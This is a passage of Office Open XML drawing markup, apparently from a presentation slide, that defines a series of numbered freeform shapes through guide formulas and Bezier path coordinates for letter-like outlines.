                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52A0E792-7208-4BA0-856F-7AD1498B030A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3448050" y="874713"/>
              <a:ext cx="79375" cy="107950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8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3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2" y="251"/>
                    <a:pt x="149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8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8" y="278"/>
                    <a:pt x="133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2" name="Freeform 1088">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2F12C1-02DF-47B1-B5FA-4AE4241ADAF4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1498600" y="1095375"/>
              <a:ext cx="88900" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 234 w 234"/>
                <a:gd name="T1" fmla="*/ 54 h 305"/>
                <a:gd name="T2" fmla="*/ 234 w 234"/>
                <a:gd name="T3" fmla="*/ 16 h 305"/>
                <a:gd name="T4" fmla="*/ 218 w 234"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 16 w 234"/>
                <a:gd name="T7" fmla="*/ 0 h 305"/>
                <a:gd name="T8" fmla="*/ 0 w 234"/>
                <a:gd name="T9" fmla="*/ 16 h 305"/>
                <a:gd name="T10" fmla="*/ 0 w 234"/>
                <a:gd name="T11" fmla="*/ 54 h 305"/>
                <a:gd name="T12" fmla="*/ 13 w 234"/>
                <a:gd name="T13" fmla="*/ 70 h 305"/>
                <a:gd name="T14" fmla="*/ 26 w 234"/>
                <a:gd name="T15" fmla="*/ 54 h 305"/>
                <a:gd name="T16" fmla="*/ 26 w 234"/>
                <a:gd name="T17" fmla="*/ 21 h 305"/>
                <a:gd name="T18" fmla="*/ 105 w 234"/>
                <a:gd name="T19" fmla="*/ 21 h 305"/>
                <a:gd name="T20" fmla="*/ 105 w 234"/>
                <a:gd name="T21" fmla="*/ 284 h 305"/>
                <a:gd name="T22" fmla="*/ 73 w 234"/>
                <a:gd name="T23" fmla="*/ 284 h 305"/>
                <a:gd name="T24" fmla="*/ 57 w 234"/>
                <a:gd name="T25" fmla="*/ 294 h 305"/>
                <a:gd name="T26" fmla="*/ 73 w 234"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 162 w 234"/>
                <a:gd name="T29" fmla="*/ 305 h 305"/>
                <a:gd name="T30" fmla="*/ 177 w 234"/>
                <a:gd name="T31" fmla="*/ 294 h 305"/>
                <a:gd name="T32" fmla="*/ 162 w 234"/>
                <a:gd name="T33" fmla="*/ 284 h 305"/>
                <a:gd name="T34" fmla="*/ 130 w 234"/>
                <a:gd name="T35" fmla="*/ 284 h 305"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 21 h 305"/>
                <a:gd name="T38" fmla="*/ 208 w 234"/>
                <a:gd name="T39" fmla="*/ 21 h 305"/>
                <a:gd name="T40" fmla="*/ 208 w 234"/>
                <a:gd name="T41" fmla="*/ 54 h 305"/>
                <a:gd name="T42" fmla="*/ 221 w 234"/>
                <a:gd name="T43" fmla="*/ 70 h 305"/>
                <a:gd name="T44" fmla="*/ 234 w 234"/>
                <a:gd name="T45" fmla="*/ 5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305">
                  <a:moveTo>
                    <a:pt x="234" y="54"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="234" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="4"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="218" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="54"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="13" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="70"/>
                    <a:pt x="26" y="62"/>
                    <a:pt x="26" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="284"/>
                    <a:pt x="57" y="284"/>
                    <a:pt x="57" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="305"/>
                    <a:pt x="67" y="305"/>
                    <a:pt x="73" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="162" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="305"/>
                    <a:pt x="177" y="305"/>
                    <a:pt x="177" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="284"/>
                    <a:pt x="168" y="284"/>
                    <a:pt x="162" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="130" y="284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="54"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="61"/>
                    <a:pt x="208" y="70"/>
                    <a:pt x="221" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="70"/>
                    <a:pt x="234" y="62"/>
                    <a:pt x="234" y="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3" name="Freeform 1089">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A1DD077-1A30-410C-89F4-1E7ED709BD5F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1601787" y="1130300"/>
              <a:ext cx="88900" cy="85725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0 h 219"/>
                <a:gd name="T14" fmla="*/ 49 w 232"/>
                <a:gd name="T15" fmla="*/ 32 h 219"/>
                <a:gd name="T16" fmla="*/ 84 w 232"/>
                <a:gd name="T17" fmla="*/ 20 h 219"/>
                <a:gd name="T18" fmla="*/ 154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6 w 232"/>
                <a:gd name="T25" fmla="*/ 197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2 h 219"/>
                <a:gd name="T32" fmla="*/ 131 w 232"/>
                <a:gd name="T33" fmla="*/ 188 h 219"/>
                <a:gd name="T34" fmla="*/ 84 w 232"/>
                <a:gd name="T35" fmla="*/ 198 h 219"/>
                <a:gd name="T36" fmla="*/ 25 w 232"/>
                <a:gd name="T37" fmla="*/ 155 h 219"/>
                <a:gd name="T38" fmla="*/ 154 w 232"/>
                <a:gd name="T39" fmla="*/ 103 h 219"/>
                <a:gd name="T40" fmla="*/ 154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39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0"/>
                    <a:pt x="31" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="50"/>
                    <a:pt x="49" y="47"/>
                    <a:pt x="49" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="22"/>
                    <a:pt x="68" y="20"/>
                    <a:pt x="84" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="20"/>
                    <a:pt x="154" y="38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8"/>
                    <a:pt x="31" y="219"/>
                    <a:pt x="80" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="219"/>
                    <a:pt x="129" y="215"/>
                    <a:pt x="156" y="197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8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1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4" name="Freeform 1090">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B536340-B11B-47D5-8002-8C9E7AF1DBE1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1700212" y="1130300"/>
              <a:ext cx="85725" cy="84138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3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49 w 224"/>
                <a:gd name="T27" fmla="*/ 215 h 215"/>
                <a:gd name="T28" fmla="*/ 165 w 224"/>
                <a:gd name="T29" fmla="*/ 204 h 215"/>
                <a:gd name="T30" fmla="*/ 149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5" name="Freeform 1091">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DFDD440-AEC9-4B60-9AE4-C7318142D3B3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1798637" y="1130300"/>
              <a:ext cx="92075" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 238 w 238"/>
                <a:gd name="T1" fmla="*/ 22 h 335"/>
                <a:gd name="T2" fmla="*/ 205 w 238"/>
                <a:gd name="T3" fmla="*/ 0 h 335"/>
                <a:gd name="T4" fmla="*/ 151 w 238"/>
                <a:gd name="T5" fmla="*/ 18 h 335"/>
                <a:gd name="T6" fmla="*/ 101 w 238"/>
                <a:gd name="T7" fmla="*/ 2 h 335"/>
                <a:gd name="T8" fmla="*/ 21 w 238"/>
                <a:gd name="T9" fmla="*/ 79 h 335"/>
                <a:gd name="T10" fmla="*/ 38 w 238"/>
                <a:gd name="T11" fmla="*/ 128 h 335"/>
                <a:gd name="T12" fmla="*/ 27 w 238"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 41 w 238"/>
                <a:gd name="T15" fmla="*/ 202 h 335"/>
                <a:gd name="T16" fmla="*/ 0 w 238"/>
                <a:gd name="T17" fmla="*/ 264 h 335"/>
                <a:gd name="T18" fmla="*/ 116 w 238"/>
                <a:gd name="T19" fmla="*/ 335 h 335"/>
                <a:gd name="T20" fmla="*/ 231 w 238"/>
                <a:gd name="T21" fmla="*/ 264 h 335"/>
                <a:gd name="T22" fmla="*/ 198 w 238"/>
                <a:gd name="T23" fmla="*/ 210 h 335"/>
                <a:gd name="T24" fmla="*/ 126 w 238"/>
                <a:gd name="T25" fmla="*/ 196 h 335"/>
                <a:gd name="T26" fmla="*/ 89 w 238"/>
                <a:gd name="T27" fmla="*/ 196 h 335"/>
                <a:gd name="T28" fmla="*/ 74 w 238"/>
                <a:gd name="T29" fmla="*/ 195 h 335"/>
                <a:gd name="T30" fmla="*/ 53 w 238"/>
                <a:gd name="T31" fmla="*/ 186 h 335"/>
                <a:gd name="T32" fmla="*/ 46 w 238"/>
                <a:gd name="T33" fmla="*/ 164 h 335"/>
                <a:gd name="T34" fmla="*/ 52 w 238"/>
                <a:gd name="T35" fmla="*/ 142 h 335"/>
                <a:gd name="T36" fmla="*/ 101 w 238"/>
                <a:gd name="T37" fmla="*/ 157 h 335"/>
                <a:gd name="T38" fmla="*/ 180 w 238"/>
                <a:gd name="T39" fmla="*/ 79 h 335"/>
                <a:gd name="T40" fmla="*/ 165 w 238"/>
                <a:gd name="T41" fmla="*/ 32 h 335"/>
                <a:gd name="T42" fmla="*/ 206 w 238"/>
                <a:gd name="T43" fmla="*/ 20 h 335"/>
                <a:gd name="T44" fmla="*/ 222 w 238"/>
                <a:gd name="T45" fmla="*/ 38 h 335"/>
                <a:gd name="T46" fmla="*/ 238 w 238"/>
                <a:gd name="T47" fmla="*/ 22 h 335"/>
                <a:gd name="T48" fmla="*/ 155 w 238"/>
                <a:gd name="T49" fmla="*/ 79 h 335"/>
                <a:gd name="T50" fmla="*/ 101 w 238"/>
                <a:gd name="T51" fmla="*/ 137 h 335"/>
                <a:gd name="T52" fmla="*/ 46 w 238"/>
                <a:gd name="T53" fmla="*/ 80 h 335"/>
                <a:gd name="T54" fmla="*/ 101 w 238"/>
                <a:gd name="T55" fmla="*/ 22 h 335"/>
                <a:gd name="T56" fmla="*/ 155 w 238"/>
                <a:gd name="T57" fmla="*/ 79 h 335"/>
                <a:gd name="T58" fmla="*/ 211 w 238"/>
                <a:gd name="T59" fmla="*/ 264 h 335"/>
                <a:gd name="T60" fmla="*/ 116 w 238"/>
                <a:gd name="T61" fmla="*/ 314 h 335"/>
                <a:gd name="T62" fmla="*/ 20 w 238"/>
                <a:gd name="T63" fmla="*/ 264 h 335"/>
                <a:gd name="T64" fmla="*/ 44 w 238"/>
                <a:gd name="T65" fmla="*/ 224 h 335"/>
                <a:gd name="T66" fmla="*/ 102 w 238"/>
                <a:gd name="T67" fmla="*/ 215 h 335"/>
                <a:gd name="T68" fmla="*/ 211 w 238"/>
                <a:gd name="T69" fmla="*/ 26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35">
                  <a:moveTo>
                    <a:pt x="238" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="12"/>
                    <a:pt x="229" y="0"/>
                    <a:pt x="205" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="0"/>
                    <a:pt x="176" y="0"/>
                    <a:pt x="151" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="11"/>
                    <a:pt x="123" y="2"/>
                    <a:pt x="101" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="21" y="38"/>
                    <a:pt x="21" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="100"/>
                    <a:pt x="29" y="116"/>
                    <a:pt x="38" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="139"/>
                    <a:pt x="27" y="149"/>
                    <a:pt x="27" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="180"/>
                    <a:pt x="33" y="191"/>
                    <a:pt x="41" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="226"/>
                    <a:pt x="0" y="259"/>
                    <a:pt x="0" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="335"/>
                    <a:pt x="231" y="306"/>
                    <a:pt x="231" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="247"/>
                    <a:pt x="222" y="223"/>
                    <a:pt x="198" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="206"/>
                    <a:pt x="170" y="196"/>
                    <a:pt x="126" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="196"/>
                    <a:pt x="78" y="195"/>
                    <a:pt x="74" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="195"/>
                    <a:pt x="61" y="194"/>
                    <a:pt x="53" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="177"/>
                    <a:pt x="46" y="164"/>
                    <a:pt x="46" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="162"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="52" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="146"/>
                    <a:pt x="77" y="157"/>
                    <a:pt x="101" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="157"/>
                    <a:pt x="180" y="122"/>
                    <a:pt x="180" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="65"/>
                    <a:pt x="176" y="51"/>
                    <a:pt x="165" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="23"/>
                    <a:pt x="194" y="21"/>
                    <a:pt x="206" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="35"/>
                    <a:pt x="218" y="38"/>
                    <a:pt x="222" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="38"/>
                    <a:pt x="238" y="33"/>
                    <a:pt x="238" y="22"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="155" y="79"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="112"/>
                    <a:pt x="130" y="137"/>
                    <a:pt x="101" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="137"/>
                    <a:pt x="46" y="110"/>
                    <a:pt x="46" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="47"/>
                    <a:pt x="71" y="22"/>
                    <a:pt x="101" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="22"/>
                    <a:pt x="155" y="49"/>
                    <a:pt x="155" y="79"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211" y="264"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="289"/>
                    <a:pt x="170" y="314"/>
                    <a:pt x="116" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="314"/>
                    <a:pt x="20" y="289"/>
                    <a:pt x="20" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="254"/>
                    <a:pt x="25" y="235"/>
                    <a:pt x="44" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="215"/>
                    <a:pt x="62" y="215"/>
                    <a:pt x="102" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="215"/>
                    <a:pt x="211" y="217"/>
                    <a:pt x="211" y="2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6" name="Freeform 1092">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B419C112-5CEF-4232-8DBC-3666D2E418E4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1905000" y="1130300"/>
              <a:ext cx="76200" cy="85725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0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0"/>
                    <a:pt x="68" y="20"/>
                    <a:pt x="106" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="20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7" name="Freeform 1093">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8BAFE08-7F71-4DFB-B3A4-84A84C8A10C8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1998662" y="1106488"/>
              <a:ext cx="79375" cy="109538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8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3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2" y="251"/>
                    <a:pt x="149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8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8" y="278"/>
                    <a:pt x="133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8" name="Freeform 1094">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154A66B8-90BF-4540-891A-4DDA9D94B513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2203450" y="1130300"/>
              <a:ext cx="88900" cy="85725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4 w 232"/>
                <a:gd name="T11" fmla="*/ 32 h 219"/>
                <a:gd name="T12" fmla="*/ 31 w 232"/>
                <a:gd name="T13" fmla="*/ 50 h 219"/>
                <a:gd name="T14" fmla="*/ 49 w 232"/>
                <a:gd name="T15" fmla="*/ 32 h 219"/>
                <a:gd name="T16" fmla="*/ 84 w 232"/>
                <a:gd name="T17" fmla="*/ 20 h 219"/>
                <a:gd name="T18" fmla="*/ 155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7 w 232"/>
                <a:gd name="T25" fmla="*/ 197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8 h 219"/>
                <a:gd name="T34" fmla="*/ 84 w 232"/>
                <a:gd name="T35" fmla="*/ 198 h 219"/>
                <a:gd name="T36" fmla="*/ 26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39"/>
                    <a:pt x="153" y="0"/>
                    <a:pt x="83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0"/>
                    <a:pt x="31" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="50"/>
                    <a:pt x="49" y="47"/>
                    <a:pt x="49" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="22"/>
                    <a:pt x="68" y="20"/>
                    <a:pt x="84" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="20"/>
                    <a:pt x="155" y="38"/>
                    <a:pt x="155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8"/>
                    <a:pt x="31" y="219"/>
                    <a:pt x="80" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="219"/>
                    <a:pt x="129" y="215"/>
                    <a:pt x="157" y="197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8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6" y="178"/>
                    <a:pt x="26" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26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9" name="Freeform 1095">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F49403-9D74-4789-9AD3-957D02121437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2301875" y="1095375"/>
              <a:ext cx="88900" cy="1206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0" name="Freeform 1096">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BC85BC-E242-49E8-AC57-B33C6055D9A4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2401887" y="1095375"/>
              <a:ext cx="88900" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 234 w 234"/>
                <a:gd name="T1" fmla="*/ 294 h 308"/>
                <a:gd name="T2" fmla="*/ 219 w 234"/>
                <a:gd name="T3" fmla="*/ 284 h 308"/>
                <a:gd name="T4" fmla="*/ 191 w 234"/>
                <a:gd name="T5" fmla="*/ 284 h 308"/>
                <a:gd name="T6" fmla="*/ 191 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 308"/>
                <a:gd name="T8" fmla="*/ 175 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 308"/>
                <a:gd name="T10" fmla="*/ 138 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 308"/>
                <a:gd name="T12" fmla="*/ 122 w 234"/>
                <a:gd name="T13" fmla="*/ 11 h 308"/>
                <a:gd name="T14" fmla="*/ 137 w 234"/>
                <a:gd name="T15" fmla="*/ 21 h 308"/>
                <a:gd name="T16" fmla="*/ 166 w 234"/>
                <a:gd name="T17" fmla="*/ 21 h 308"/>
                <a:gd name="T18" fmla="*/ 166 w 234"/>
                <a:gd name="T19" fmla="*/ 119 h 308"/>
                <a:gd name="T20" fmla="*/ 100 w 234"/>
                <a:gd name="T21" fmla="*/ 90 h 308"/>
                <a:gd name="T22" fmla="*/ 0 w 234"/>
                <a:gd name="T23" fmla="*/ 199 h 308"/>
                <a:gd name="T24" fmla="*/ 95 w 234"/>
                <a:gd name="T25" fmla="*/ 308 h 308"/>
                <a:gd name="T26" fmla="*/ 166 w 234"/>
                <a:gd name="T27" fmla="*/ 272 h 308"/>
                <a:gd name="T28" fmla="*/ 181 w 234"/>
                <a:gd name="T29" fmla="*/ 305 h 308"/>
                <a:gd name="T30" fmla="*/ 219 w 234"/>
                <a:gd name="T31" fmla="*/ 305 h 308"/>
                <a:gd name="T32" fmla="*/ 234 w 234"/>
                <a:gd name="T33" fmla="*/ 294 h 308"/>
                <a:gd name="T34" fmla="*/ 166 w 234"/>
                <a:gd name="T35" fmla="*/ 210 h 308"/>
                <a:gd name="T36" fmla="*/ 97 w 234"/>
                <a:gd name="T37" fmla="*/ 287 h 308"/>
                <a:gd name="T38" fmla="*/ 25 w 234"/>
                <a:gd name="T39" fmla="*/ 199 h 308"/>
                <a:gd name="T40" fmla="*/ 102 w 234"/>
                <a:gd name="T41" fmla="*/ 111 h 308"/>
                <a:gd name="T42" fmla="*/ 166 w 234"/>
                <a:gd name="T43" fmla="*/ 173 h 308"/>
                <a:gd name="T44" fmla="*/ 166 w 234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308">
                  <a:moveTo>
                    <a:pt x="234" y="294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234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5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7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5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4" y="305"/>
                    <a:pt x="234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0" y="287"/>
                    <a:pt x="97" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="287"/>
                    <a:pt x="25" y="248"/>
                    <a:pt x="25" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="146"/>
                    <a:pt x="63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1" name="Freeform 1097">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6EB0330-B8E1-4840-9CA1-6A8EDC3D4B27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2500312" y="1130300"/>
              <a:ext cx="85725" cy="84138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2" name="Freeform 1098">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57D519B1-475D-40D1-A09F-21115D12A5DF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2605087" y="1130300"/>
              <a:ext cx="76200" cy="85725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0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0"/>
                    <a:pt x="67" y="20"/>
                    <a:pt x="106" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="20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3" name="Freeform 1099">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CAEC3EB-08F0-4AA2-A795-E84DE055A42F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2708275" y="1130300"/>
              <a:ext cx="73025" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 189 w 189"/>
                <a:gd name="T1" fmla="*/ 157 h 219"/>
                <a:gd name="T2" fmla="*/ 110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1 w 189"/>
                <a:gd name="T9" fmla="*/ 20 h 219"/>
                <a:gd name="T10" fmla="*/ 149 w 189"/>
                <a:gd name="T11" fmla="*/ 59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5 h 219"/>
                <a:gd name="T18" fmla="*/ 163 w 189"/>
                <a:gd name="T19" fmla="*/ 0 h 219"/>
                <a:gd name="T20" fmla="*/ 151 w 189"/>
                <a:gd name="T21" fmla="*/ 12 h 219"/>
                <a:gd name="T22" fmla="*/ 92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6 w 189"/>
                <a:gd name="T31" fmla="*/ 198 h 219"/>
                <a:gd name="T32" fmla="*/ 24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0" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="89"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="86"/>
                    <a:pt x="21" y="77"/>
                    <a:pt x="21" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="40"/>
                    <a:pt x="38" y="20"/>
                    <a:pt x="91" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="20"/>
                    <a:pt x="146" y="39"/>
                    <a:pt x="149" y="59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8"/>
                    <a:pt x="173" y="51"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="15"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="9"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="0"/>
                    <a:pt x="153" y="4"/>
                    <a:pt x="151" y="12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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124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6" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="198"/>
                    <a:pt x="40" y="192"/>
                    <a:pt x="24" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22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2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4" name="Freeform 1100">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A6A7C4-0AD4-4070-B8B0-9B127E85803B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2808287" y="1130300"/>
              <a:ext cx="73025" cy="85725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0 h 219"/>
                <a:gd name="T10" fmla="*/ 149 w 189"/>
                <a:gd name="T11" fmla="*/ 59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5 h 219"/>
                <a:gd name="T18" fmla="*/ 164 w 189"/>
                <a:gd name="T19" fmla="*/ 0 h 219"/>
                <a:gd name="T20" fmla="*/ 151 w 189"/>
                <a:gd name="T21" fmla="*/ 12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1" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75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0"/>
                    <a:pt x="38" y="20"/>
                    <a:pt x="92" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="20"/>
                    <a:pt x="147" y="39"/>
                    <a:pt x="149" y="59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8"/>
                    <a:pt x="174" y="51"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="15"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="9"/>
                    <a:pt x="174" y="0"/>
                    <a:pt x="164" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="0"/>
                    <a:pt x="154" y="4"/>
                    <a:pt x="151" y="12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7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5" name="Freeform 1101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
